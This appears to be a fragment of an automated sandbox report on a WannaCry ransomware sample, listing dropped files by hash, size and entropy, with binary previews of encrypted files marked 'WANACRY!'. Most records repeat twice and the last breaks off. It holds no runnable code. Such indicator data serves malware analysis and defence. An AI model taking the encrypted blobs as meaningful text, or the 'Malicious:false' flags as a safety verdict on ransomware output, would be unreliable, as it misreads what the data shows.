                                                                                      SSDEEP:24:bkP55vkJqDI0gblxPzulKEEkAQ5w0upf4w1KvIHV9NGw9ND98RlC:bkP55c8U0gZxPiKzQ5w0Yf4tOQw938O
                                                                                      MD5:0B1B073260EC519515A500C57A97FFE8
                                                                                      SHA1:FDE37FB1FC19943DBE4E5D4CA98086898DC0D689
                                                                                      SHA-256:E267ED4D8AEEEF1EBED388EDB90FDFA4DC076D8A02E3FA9CC359CC604A67367A
                                                                                      SHA-512:0036243D4FCE44757494CA1867AB00D9769659751DFCF26417212F688B71C30905FBEE0FF3F04D04FA96C5A6243EC616C3F037F10EA892B1307091853FA551AA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....qaAL*....6./....W.* ./..i..e......".x.7..-...V...J.Nz.C....vOY\.6m..p...V....S7.:..R..m.$.B*....Mk....M.......|.....%.(..2..,z.^4....0.R...{../..q.,....WTH.C.......7*sx.~P.0......u.......j....._.+..,8l..Y.w..l...E...}o.Tm..~..U..h.3..........3.............97@..Z3A#d..1.....?...5....Ip..(w.....}....|...s...x.R.S....x{.k..%3.._^i....7.Vt.k.]..G..}.}.e9......b.#0o%..OP..$...4..A..].....j...wu...j...TgE......M..J...Zq.8.CR.7.L)L...n.Wn.v....f.....w..........).]...J....>..O.Ecu.t.....E..S.;..p$..P.'..s..9..%...(x+.L..n.2Q.H...c..C.../=..D...y.c.......R".........[..bP.4(P+.,......1-%{i.rtP.=.....V.H.C.*.;x.0..Q...a.(.."R..Q!...B.....!..,d..B&.....M-..l.4.B.....G..Q.t.V...."..f....5.....w.....c.....X...O+A.o..^..(.s.Q.g..Z.....B.q. ..I&..s....A.-YD.....Ewo..!7...<u<.7.......v..Z}}C./e...........K.?.`}..wX...L.B.....r..#M.....Yy....|+....;.n.../M.Y.~l...;.M..w$@...9..SZb..t..M6....m....@.V....~....aXX....$.t...a...#.(t...FHC.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.855999877433789
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkP55vkJqDI0gblxPzulKEEkAQ5w0upf4w1KvIHV9NGw9ND98RlC:bkP55c8U0gZxPiKzQ5w0Yf4tOQw938O
                                                                                      MD5:0B1B073260EC519515A500C57A97FFE8
                                                                                      SHA1:FDE37FB1FC19943DBE4E5D4CA98086898DC0D689
                                                                                      SHA-256:E267ED4D8AEEEF1EBED388EDB90FDFA4DC076D8A02E3FA9CC359CC604A67367A
                                                                                      SHA-512:0036243D4FCE44757494CA1867AB00D9769659751DFCF26417212F688B71C30905FBEE0FF3F04D04FA96C5A6243EC616C3F037F10EA892B1307091853FA551AA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....qaAL*....6./....W.* ./..i..e......".x.7..-...V...J.Nz.C....vOY\.6m..p...V....S7.:..R..m.$.B*....Mk....M.......|.....%.(..2..,z.^4....0.R...{../..q.,....WTH.C.......7*sx.~P.0......u.......j....._.+..,8l..Y.w..l...E...}o.Tm..~..U..h.3..........3.............97@..Z3A#d..1.....?...5....Ip..(w.....}....|...s...x.R.S....x{.k..%3.._^i....7.Vt.k.]..G..}.}.e9......b.#0o%..OP..$...4..A..].....j...wu...j...TgE......M..J...Zq.8.CR.7.L)L...n.Wn.v....f.....w..........).]...J....>..O.Ecu.t.....E..S.;..p$..P.'..s..9..%...(x+.L..n.2Q.H...c..C.../=..D...y.c.......R".........[..bP.4(P+.,......1-%{i.rtP.=.....V.H.C.*.;x.0..Q...a.(.."R..Q!...B.....!..,d..B&.....M-..l.4.B.....G..Q.t.V...."..f....5.....w.....c.....X...O+A.o..^..(.s.Q.g..Z.....B.q. ..I&..s....A.-YD.....Ewo..!7...<u<.7.......v..Z}}C./e...........K.?.`}..wX...L.B.....r..#M.....Yy....|+....;.n.../M.Y.~l...;.M..w$@...9..SZb..t..M6....m....@.V....~....aXX....$.t...a...#.(t...FHC.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865009210999688
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYsIe0nutBretJpih5UNr+EwpnWs/2HTw+1TEvt7I6o7FL:bkmo1ehiLPn2zw+Vct7I6o7h
                                                                                      MD5:E114D952B8A5B9FDCA2E1298B3468776
                                                                                      SHA1:D826B1B5E207B29DC14DF553EEE83BA0EA8E1475
                                                                                      SHA-256:3CBB5B9B517426AF728E323CC930EF159FABC354CE7BFDCDE4CAEF135768BDD5
                                                                                      SHA-512:DB6450D8824DFA5963FE40C7EC1BD8398D309C1A54D6D886F35D11B4C298A526F2B9F0DC31289B7892DF7E337E79C9664D7BE058E36AE42D3581DA87DCA51686
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....&.o...g...G.:......hOP..L..Pit.....k....2.-...".%...$.d...;......~O....T.?.J.a..Lv..+@gdb..=1.y... ..{..Sa..... .A.L8Z.eS...0....T..+.Uj...:......)..h.r.[........#...u......B...f...9G..<....bz......xt.....=..E._..E}q.B.{.x)...-....\.G..q.-.............|..E!.j>.t.w]....o.t..52.y.1...w.}...R.....+.M.X.zn.7.}...*......Q4bt...ki.&..B.6...-#..G7h..U#..y..r.il.2..SH%(K.d%g.i.i.xL}@...-../%..f..V........^...]... .Ah..S.iC...?/,dx?.$.j._.kv.".......U...T.. .w.z.m.(...Y3Ch...B....I:......1qy.\.s.E.B@....Z..9Qp.X)...y......7..!s..}.4..Z.s.p..o.).%wA.......Z...e80..s..lrQJ...YN".....N..P..:.|.q...Z...(1_ .._a.......V.1./..d6Z.$...Y......c?cc....J+.^..)...:Ax.{.v....N.....9..,?......H:%q.C....B.....=%._.$....TH.....5._..F.N......V.?..3.:u....:z3.....^..Fd..@r..Lb..T..2.q....v.Z......`...A.vh..r..L+......B.99^...~s.g.A.1o3.q#...S...%o.|...m1F.....KM.l."...Y.....5-.. ..HH...%O.z......"..{\h..t.C.]..L....YZF&../..!..p..W.n.._F....'.|.3..(... .
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.865009210999688
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYsIe0nutBretJpih5UNr+EwpnWs/2HTw+1TEvt7I6o7FL:bkmo1ehiLPn2zw+Vct7I6o7h
                                                                                      MD5:E114D952B8A5B9FDCA2E1298B3468776
                                                                                      SHA1:D826B1B5E207B29DC14DF553EEE83BA0EA8E1475
                                                                                      SHA-256:3CBB5B9B517426AF728E323CC930EF159FABC354CE7BFDCDE4CAEF135768BDD5
                                                                                      SHA-512:DB6450D8824DFA5963FE40C7EC1BD8398D309C1A54D6D886F35D11B4C298A526F2B9F0DC31289B7892DF7E337E79C9664D7BE058E36AE42D3581DA87DCA51686
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....&.o...g...G.:......hOP..L..Pit.....k....2.-...".%...$.d...;......~O....T.?.J.a..Lv..+@gdb..=1.y... ..{..Sa..... .A.L8Z.eS...0....T..+.Uj...:......)..h.r.[........#...u......B...f...9G..<....bz......xt.....=..E._..E}q.B.{.x)...-....\.G..q.-.............|..E!.j>.t.w]....o.t..52.y.1...w.}...R.....+.M.X.zn.7.}...*......Q4bt...ki.&..B.6...-#..G7h..U#..y..r.il.2..SH%(K.d%g.i.i.xL}@...-../%..f..V........^...]... .Ah..S.iC...?/,dx?.$.j._.kv.".......U...T.. .w.z.m.(...Y3Ch...B....I:......1qy.\.s.E.B@....Z..9Qp.X)...y......7..!s..}.4..Z.s.p..o.).%wA.......Z...e80..s..lrQJ...YN".....N..P..:.|.q...Z...(1_ .._a.......V.1./..d6Z.$...Y......c?cc....J+.^..)...:Ax.{.v....N.....9..,?......H:%q.C....B.....=%._.$....TH.....5._..F.N......V.?..3.:u....:z3.....^..Fd..@r..Lb..T..2.q....v.Z......`...A.vh..r..L+......B.99^...~s.g.A.1o3.q#...S...%o.|...m1F.....KM.l."...Y.....5-.. ..HH...%O.z......"..{\h..t.C.]..L....YZF&../..!..p..W.n.._F....'.|.3..(... .
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.833002328637146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHkRtiB0pOvi90YMBbjuf23YD++6vw+1OgOX5FKrf/ORtzFtOHlCpg2J3XeU1tI:bkHkkNB2feYD+VweQ0L/O7O2gWXeEGcM
                                                                                      MD5:0E37A54D8007DE4F28B0DCE07333E3F5
                                                                                      SHA1:7B7573A70A02E8877FC6AA9BE5D27C20F9D1037F
                                                                                      SHA-256:AC13E5289E10CCD7FF9C4CF19FB54FD16024EDDE3294A36D3551715C73255C63
                                                                                      SHA-512:0E90EF455C1FB60E69F0B49B622C36FDC8C865C784FE05B619BCCBE53CE9365E101B35876645AAC30558C8982D8C58DE02D8E7C0D4DD06E41A8A3964D1921777
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...._'....(;}$...x..*WE..P..~..d.m.lodh..))....Wa<..(B...RC$..1.........p..4..s.wm...I.......<......i^..(w..r.m.}:E.....z.T.....QO..Ey...s.>...LP3n..T...3.o....9.4...:dW."p....xxM.pI...nXd.^.b.".@m..li-..o.+.!e...s(Px.v..sR2...!i0a.sZ'z.{.hx.................8...(M...Ao......<..%...&..8p..h..0h...;..}..o.~+^.r......j.B...&.._H.].....2.......P..]..A........"....T.v.e..?.....|.b(...ny..4.y..w.?.\..?.N....8GH9.&a..Vr./.o.*.vi......;,v....gn...._(..X....}.PT?.}..O..'{.t7%~q.%..gLsPZt..`..&.2.....P..R..e.V..tQ.z=..`..4..D..=...2k.xhR||X.l..$/!..Fw2T..]?.[7.S.oM.k.F. .....OF....@.dY............$...L...%.].....B:1S:Tb...........P.'.5....r.T$7e...".q.-..g.'.".JR;..gp.;..P..nv`.9n.....y,..I..'.Ea..%....OE.;......L.....I.....m.7...~..c..\.#....=..8.Gt..x.W...q?...E7,.........i|0..W.#.O.^#4....Pp.E'"ww.o. ...'.....}..#P......I..6.Q.1....\......^R...mv.......n.6.......=6.1$.(.3..J......E....i....<.c..t...JY..4T.Y.s...%..bqM^g.P#d....(.UL.*>[..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.833002328637146
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkHkRtiB0pOvi90YMBbjuf23YD++6vw+1OgOX5FKrf/ORtzFtOHlCpg2J3XeU1tI:bkHkkNB2feYD+VweQ0L/O7O2gWXeEGcM
                                                                                      MD5:0E37A54D8007DE4F28B0DCE07333E3F5
                                                                                      SHA1:7B7573A70A02E8877FC6AA9BE5D27C20F9D1037F
                                                                                      SHA-256:AC13E5289E10CCD7FF9C4CF19FB54FD16024EDDE3294A36D3551715C73255C63
                                                                                      SHA-512:0E90EF455C1FB60E69F0B49B622C36FDC8C865C784FE05B619BCCBE53CE9365E101B35876645AAC30558C8982D8C58DE02D8E7C0D4DD06E41A8A3964D1921777
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!...._'....(;}$...x..*WE..P..~..d.m.lodh..))....Wa<..(B...RC$..1.........p..4..s.wm...I.......<......i^..(w..r.m.}:E.....z.T.....QO..Ey...s.>...LP3n..T...3.o....9.4...:dW."p....xxM.pI...nXd.^.b.".@m..li-..o.+.!e...s(Px.v..sR2...!i0a.sZ'z.{.hx.................8...(M...Ao......<..%...&..8p..h..0h...;..}..o.~+^.r......j.B...&.._H.].....2.......P..]..A........"....T.v.e..?.....|.b(...ny..4.y..w.?.\..?.N....8GH9.&a..Vr./.o.*.vi......;,v....gn...._(..X....}.PT?.}..O..'{.t7%~q.%..gLsPZt..`..&.2.....P..R..e.V..tQ.z=..`..4..D..=...2k.xhR||X.l..$/!..Fw2T..]?.[7.S.oM.k.F. .....OF....@.dY............$...L...%.].....B:1S:Tb...........P.'.5....r.T$7e...".q.-..g.'.".JR;..gp.;..P..nv`.9n.....y,..I..'.Ea..%....OE.;......L.....I.....m.7...~..c..\.#....=..8.Gt..x.W...q?...E7,.........i|0..W.#.O.^#4....Pp.E'"ww.o. ...'.....}..#P......I..6.Q.1....\......^R...mv.......n.6.......=6.1$.(.3..J......E....i....<.c..t...JY..4T.Y.s...%..bqM^g.P#d....(.UL.*>[..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8453434751421485
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkY4gE5jyA72My3G+Rq487F+xwzXQ/xpwUPdulfs1hiKwu:bk8s3TKZT87QxmQJ2AulfcII
                                                                                      MD5:7257AA085377E41437A3F35BC3A9B390
                                                                                      SHA1:C2698F72272E9F17536EC70EAA04CE5EB6D50C8D
                                                                                      SHA-256:1E2BD5B064B50A8976B3219E467F52D963B904D1225FB4B6FA6F28BC83BD543C
                                                                                      SHA-512:A9C6FD361F6BFFF05C15552E4B3BEB1A20601A0E8129AB9BFA53794BE80F4E81D1DE160CC89FC81E7E5B9BB99ACB1419FF748370B6847FFCBD11F94393215382
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....6.Z....7.+.`?.........~GN/71.U1.>r....<R...........&T...+.....b.\G..$C.....L.D.J....[~.R./...S...xc(.m,c^}N.;......:[...|.............(.j*b}6t.m....e..SK.>$l...U...zt.E.P....jUM..*-.e....2[.@.'.kz../d.......;.c.. .3.%.....hA.U^.....&&an<....nQ..............}.]n.[..2.x..T0..w...4v......q#.K...[n.1j....rT...)......v.)....5....e..P.J....Y?mGFRV.e.".?.".$......:...A...g.'v!$n.....78%.m:3.kg.bQ..../......".;..RZ...).j...........b...q..C...:..6 ..L..6..>1.Q..Dp..P...Y<.1."..E...c.4........rz..n...=....\2..en*h.lp[.{...;.H.? ....Wj....x{...#.M...-V....d.S..r...-X...>..{;.j.!,^...}}Q.4.J..>.y5..qm....w..b..b/#'..9q..m~..H......*..w9..EkpLLHZ.0*.G..E..h.;.K........Y.).u.^..Z.v.~.y...j.&...gG.H.jq.-.k.=...)PB)WA.~}Lb.Y..4m...5.=.mJ...8..j(..s.N.1 .,.....s..'..i."8.X.=.........=....T>......:....3...Z..d.b...T..xt..8.#..9ut..a......^5c>th.m.Aa..\R.n......+3.B...R~./...VfL.Xo2.1.fB ..@Q....'.....S1..*NJ5.....)..C....f.v..56=....:X....L...@..p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8453434751421485
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkY4gE5jyA72My3G+Rq487F+xwzXQ/xpwUPdulfs1hiKwu:bk8s3TKZT87QxmQJ2AulfcII
                                                                                      MD5:7257AA085377E41437A3F35BC3A9B390
                                                                                      SHA1:C2698F72272E9F17536EC70EAA04CE5EB6D50C8D
                                                                                      SHA-256:1E2BD5B064B50A8976B3219E467F52D963B904D1225FB4B6FA6F28BC83BD543C
                                                                                      SHA-512:A9C6FD361F6BFFF05C15552E4B3BEB1A20601A0E8129AB9BFA53794BE80F4E81D1DE160CC89FC81E7E5B9BB99ACB1419FF748370B6847FFCBD11F94393215382
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....6.Z....7.+.`?.........~GN/71.U1.>r....<R...........&T...+.....b.\G..$C.....L.D.J....[~.R./...S...xc(.m,c^}N.;......:[...|.............(.j*b}6t.m....e..SK.>$l...U...zt.E.P....jUM..*-.e....2[.@.'.kz../d.......;.c.. .3.%.....hA.U^.....&&an<....nQ..............}.]n.[..2.x..T0..w...4v......q#.K...[n.1j....rT...)......v.)....5....e..P.J....Y?mGFRV.e.".?.".$......:...A...g.'v!$n.....78%.m:3.kg.bQ..../......".;..RZ...).j...........b...q..C...:..6 ..L..6..>1.Q..Dp..P...Y<.1."..E...c.4........rz..n...=....\2..en*h.lp[.{...;.H.? ....Wj....x{...#.M...-V....d.S..r...-X...>..{;.j.!,^...}}Q.4.J..>.y5..qm....w..b..b/#'..9q..m~..H......*..w9..EkpLLHZ.0*.G..E..h.;.K........Y.).u.^..Z.v.~.y...j.&...gG.H.jq.-.k.=...)PB)WA.~}Lb.Y..4m...5.=.mJ...8..j(..s.N.1 .,.....s..'..i."8.X.=.........=....T>......:....3...Z..d.b...T..xt..8.#..9ut..a......^5c>th.m.Aa..\R.n......+3.B...R~./...VfL.Xo2.1.fB ..@Q....'.....S1..*NJ5.....)..C....f.v..56=....:X....L...@..p
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827614163046582
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8gPbbaVAjD1D2HBB4571SnXfHp5f+q6goolZon/uLbJWtCPFjUyOc1b:bk8gT+VaD1D2SMXfpIsjlZPPJWtCd4cd
                                                                                      MD5:36AC65B300E33ABE503FC3628FC9E885
                                                                                      SHA1:6572E4450B35E586492570CAA1CE3341C3A31E38
                                                                                      SHA-256:A66BE304F8BF78FA9D50994E8F1C2D04875EF0B729DCF7AD260B9DD664A3CC0C
                                                                                      SHA-512:851B5C95030A1054DF73C7756A47094875D051433E412FA0153F3B2F752938A16025B712B77156EB5293CF794CAA032EE96BA5C0DD46A250361761CD6381B8B6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8....I...;..M.o.W..P..{6.......W3AH......nn.I.,@...w.......r.W.w.F+.As..$;'Q..........c...9.VH........!.....s}w....E.......D..V.....[..Y..[y......z_(.........?.}9F....if.}9...S6...O.P.&.G:.......|...Rt...>>......Y.C8........7......l..ftP.F/..7_`...............k.".......DW.7..G....@...T.8.D......:`t.*...t/...@M..f]<>....,...;.....7........V.^..K7>..7..m.m.S..M.F..d..Q.......x`.&.'.W......9....W.969.(.EK......Y.E.Cwo...l^x..,..10.....91..I...M.Z...7.U.q.Sf..Kot......z...... ..b..u.a.[..,x.<RH............x...y.S.-..]m..+...p.s4.a...8x@....[...l..R....R..t]h8.b..kf@2`.y.O...G..ljZ+.".<.9..a...h..E.......6 ..r_H..{ ..^........84I.c.:[....>.G8.m..$.....;R.8.&.o.M.O.}.:...C..4.B......V..ug~<C...R......V..v.2..x.....~F..z..............#r..=~4X1`..{._....H...I.$..e.nS.. ...0..6Y...8MT.t.C.....|E.M.....4s....6x... ..U..m...n...q.@#....v..XR..C...2.H}0......=..4D..N.Q.%.-.Xn8....BJI.2.../wY=../..Q.....%...k.o,.n8.{._2...6..F.sN
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827614163046582
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8gPbbaVAjD1D2HBB4571SnXfHp5f+q6goolZon/uLbJWtCPFjUyOc1b:bk8gT+VaD1D2SMXfpIsjlZPPJWtCd4cd
                                                                                      MD5:36AC65B300E33ABE503FC3628FC9E885
                                                                                      SHA1:6572E4450B35E586492570CAA1CE3341C3A31E38
                                                                                      SHA-256:A66BE304F8BF78FA9D50994E8F1C2D04875EF0B729DCF7AD260B9DD664A3CC0C
                                                                                      SHA-512:851B5C95030A1054DF73C7756A47094875D051433E412FA0153F3B2F752938A16025B712B77156EB5293CF794CAA032EE96BA5C0DD46A250361761CD6381B8B6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....8....I...;..M.o.W..P..{6.......W3AH......nn.I.,@...w.......r.W.w.F+.As..$;'Q..........c...9.VH........!.....s}w....E.......D..V.....[..Y..[y......z_(.........?.}9F....if.}9...S6...O.P.&.G:.......|...Rt...>>......Y.C8........7......l..ftP.F/..7_`...............k.".......DW.7..G....@...T.8.D......:`t.*...t/...@M..f]<>....,...;.....7........V.^..K7>..7..m.m.S..M.F..d..Q.......x`.&.'.W......9....W.969.(.EK......Y.E.Cwo...l^x..,..10.....91..I...M.Z...7.U.q.Sf..Kot......z...... ..b..u.a.[..,x.<RH............x...y.S.-..]m..+...p.s4.a...8x@....[...l..R....R..t]h8.b..kf@2`.y.O...G..ljZ+.".<.9..a...h..E.......6 ..r_H..{ ..^........84I.c.:[....>.G8.m..$.....;R.8.&.o.M.O.}.:...C..4.B......V..ug~<C...R......V..v.2..x.....~F..z..............#r..=~4X1`..{._....H...I.$..e.nS.. ...0..6Y...8MT.t.C.....|E.M.....4s....6x... ..U..m...n...q.@#....v..XR..C...2.H}0......=..4D..N.Q.%.-.Xn8....BJI.2.../wY=../..Q.....%...k.o,.n8.{._2...6..F.sN
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842565193308345
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5iLntAQVQosRo1NwAbQihIttrkQuS17OKIsbN9NVFwhUrYsRJOwxaXWZm/5u1X:bkKt4Ro1OAbMtrdGs7NUh8pRJOwxHZWS
                                                                                      MD5:22CEDF43FAE3D2603C37A69F86A451A9
                                                                                      SHA1:83DA472FF64FE0340E1F1EF8ADCB5C1834028DDD
                                                                                      SHA-256:7EF42F22D2C0288610BB9A3AA1EE85F26AD3498F561C50A01680ECFF0433A998
                                                                                      SHA-512:110D3A0869CC303B53AEE00B07EC5A9EFAD609DB8121AD838DE8CED026B721F63DC1D9DADAF00488E7B16ED22080303E726B25B07B90D1D408EC77CA5E53DD14
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L....K.....U.u...9s.G.$..P.a.m.f.q..:...ARYdKuo.9....@K..2|..m..d...%zN.....!.....#..........$...&s1.<.....!.%.d.fi.w..H...a-.`........AG...SS./.'.X.wBz5..c.`...A......{3/Yr.Gq.?..cHf5.S0.T.6.td.E..D.Qx$z..9..$...3..!?..2o...:..ABm..VE...V..b...............]q.J..vR...N...}^.../..+s..c'.N...?....V.....}.V.......Q.....)Qk.....H........GR1..sG...Y.+.}...........~y1..2..1.O...(.jW.DF..O...:F.p.pt..s.."(1y........(.7.'p.Y..h.y".4........R.U.\...7L....j...3...=_D.+.F.=$..B..n..}....r....;...w!.p.~.z.:X.f.T.....{i.J..a......~..XZ ..,}p(.....M..~E..}.....[_..n.&|...-.o.J.2.c..j/..C:...m5..t...Bu.d...L?...C......N.5.Z.O:..;.B...Lc...O....G....{./|...IT...O....bWP..V........v-p.... !...^x...`u...*d..(...P]...0.cY....}}..w{.|Z...Jw..Z.c.of.^..o.J..lx..Ag...G..63uT....^EJ..@l)..Sik"Z...BOSxd..}..5....-.Z.._B..$.O;q":D<..>...R.........G..*)...up..X....8F.....<.B..0T.rh........z."...r0..z).v.....z..>7..|....R..k3\.W..c.R5.E.}.zkdj$.......r..Q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.842565193308345
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk5iLntAQVQosRo1NwAbQihIttrkQuS17OKIsbN9NVFwhUrYsRJOwxaXWZm/5u1X:bkKt4Ro1OAbMtrdGs7NUh8pRJOwxHZWS
                                                                                      MD5:22CEDF43FAE3D2603C37A69F86A451A9
                                                                                      SHA1:83DA472FF64FE0340E1F1EF8ADCB5C1834028DDD
                                                                                      SHA-256:7EF42F22D2C0288610BB9A3AA1EE85F26AD3498F561C50A01680ECFF0433A998
                                                                                      SHA-512:110D3A0869CC303B53AEE00B07EC5A9EFAD609DB8121AD838DE8CED026B721F63DC1D9DADAF00488E7B16ED22080303E726B25B07B90D1D408EC77CA5E53DD14
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....L....K.....U.u...9s.G.$..P.a.m.f.q..:...ARYdKuo.9....@K..2|..m..d...%zN.....!.....#..........$...&s1.<.....!.%.d.fi.w..H...a-.`........AG...SS./.'.X.wBz5..c.`...A......{3/Yr.Gq.?..cHf5.S0.T.6.td.E..D.Qx$z..9..$...3..!?..2o...:..ABm..VE...V..b...............]q.J..vR...N...}^.../..+s..c'.N...?....V.....}.V.......Q.....)Qk.....H........GR1..sG...Y.+.}...........~y1..2..1.O...(.jW.DF..O...:F.p.pt..s.."(1y........(.7.'p.Y..h.y".4........R.U.\...7L....j...3...=_D.+.F.=$..B..n..}....r....;...w!.p.~.z.:X.f.T.....{i.J..a......~..XZ ..,}p(.....M..~E..}.....[_..n.&|...-.o.J.2.c..j/..C:...m5..t...Bu.d...L?...C......N.5.Z.O:..;.B...Lc...O....G....{./|...IT...O....bWP..V........v-p.... !...^x...`u...*d..(...P]...0.cY....}}..w{.|Z...Jw..Z.c.of.^..o.J..lx..Ag...G..63uT....^EJ..@l)..Sik"Z...BOSxd..}..5....-.Z.._B..$.O;q":D<..>...R.........G..*)...up..X....8F.....<.B..0T.rh........z."...r0..z).v.....z..>7..|....R..k3\.W..c.R5.E.}.zkdj$.......r..Q
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827365030578656
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkN6tX+LOYYvdILfZ0HmBOBoIveFiBcDaFDANp6/52kAgPI/T4aZ1ej1y:bkN6tX+BfZ0ACmw0rgw4aZM5y
                                                                                      MD5:2FF65415C4D65EC57784782910E8E9C4
                                                                                      SHA1:1A721161B788A761B19DA930B94BD32960FFA325
                                                                                      SHA-256:842CA4ADDAC596B20CD3F22BDE23E27A12DA04D1D40F44BD5935A8FD8B533B9C
                                                                                      SHA-512:F98CA8D0072B3661EEE5EFEE6C09EBC072F0A46FA92D1E8D6ECF4F5C5A65411193E5E6F30716DB42DFA0C510FA053CA410A8C2947C9042E315D9116360BC6E97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!3....#[....S..E.>...n....-@.....j.A;l...#...?.W..b..k...:'h..K.*<U...s.*.a}..=.q.>...j.b..n#......W.;.^^..".,....po.._QT.......7.....4.+e$..s@.-&&"..i"...@.&un..eyD.K.x......d.{...H.kL......M....x3&.sCx.f...H^./.....h.R...bj....R8.% ...!.............,.bq%.4E...^...v.vg..'..L=.y&....+Z..z<...hT.kg.+!K.:.J.....6..h..../A;.C.nJ.k%...$....k.}...#.Ux5....G.....e.2~..Y...uF..TX.h.}g..K...c....Kb...I.Si..:s.J..b0...W...IW98...x9....$.Y.2.c.zp..zEH..x#]<O./A&T\.6../..x...\m,.k.H....2.Q./=/...`.E.$.D..C\.r...;!..G...a..7....,.+......l.._B.t.l......~..}......7...z...*W.0.(N...L$.l=X4..J.. .g.`.p...G.g......cX,...'...G...A..R....2...h.._`3...>....6..."....U....Mt...s..W.:./X..c,..l.....p..1.c.8.}.....Al.<4.!{.=_.`F..z..UmOBS.......Ve..F.........@\On..4N/.z....gG9.............uI..+. ..~.`;.ybe......p*...ew..Io.....bFd\...@S....`.~.......Y.............y..QZA...K...5..MX ..*Y..N....uS......).......0..Ov..K.Z&.\..>.......r...r..a.W...x
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827365030578656
                                                                                      Encrypted:false
